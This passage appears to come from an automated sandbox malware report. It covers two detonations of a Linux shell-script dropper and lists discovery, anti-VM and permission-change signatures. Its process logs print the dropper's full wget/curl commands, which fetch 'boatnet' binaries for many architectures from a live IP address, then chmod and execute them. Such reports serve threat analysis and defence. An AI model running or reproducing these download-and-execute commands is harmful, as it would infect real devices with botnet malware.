N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

92s

Max time network

96s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp

Files

N/A